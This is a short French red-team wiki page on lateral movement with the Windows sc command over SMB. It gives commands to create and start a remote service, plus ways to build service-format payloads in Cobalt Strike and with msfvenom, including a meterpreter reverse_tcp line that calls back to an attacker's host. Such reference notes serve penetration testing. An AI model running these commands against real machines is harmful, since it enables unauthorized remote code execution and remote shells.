Service Control (SC)
Il faut obligatoirement disposer de droit d'administrateur sur la machine cible.
Le contrôleur de service est particulièrement utile en tant qu'attaquant, car la planification des tâches est possible via SMB.
sc \\host.domain create ExampleService binpath= “c:\windows\system32\calc.exe”
sc \\host.domain start ExampleService
La seule réserve est que l'exécutable doit être spécifiquement un binaire de service. Les binaires de service sont différents dans le sens où ils doivent "s'enregistrer" auprès du gestionnaire de contrôle des services (SCM) et si ce n'est pas le cas, ils quittent l'exécution. Ainsi, si un binaire qui n'est pas un service est utilisé à cette fin, il reviendra en tant qu'agent/phare pendant une seconde, puis mourra.
Il est possible de directement créer un exécutable qui tournera en service avec :
Dans Cobalt Strike via Attacks > Packages > Windows Executable (S) et en sélectionnant le type de sortie Service Binary.
Executable Windows en tant que service dans CobaltStrike
Avec msfvenom en précisant le format exe-service :
msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST=<IP> LPORT=<PORT> -o service.exe
Dernière mise à jour 4mo ago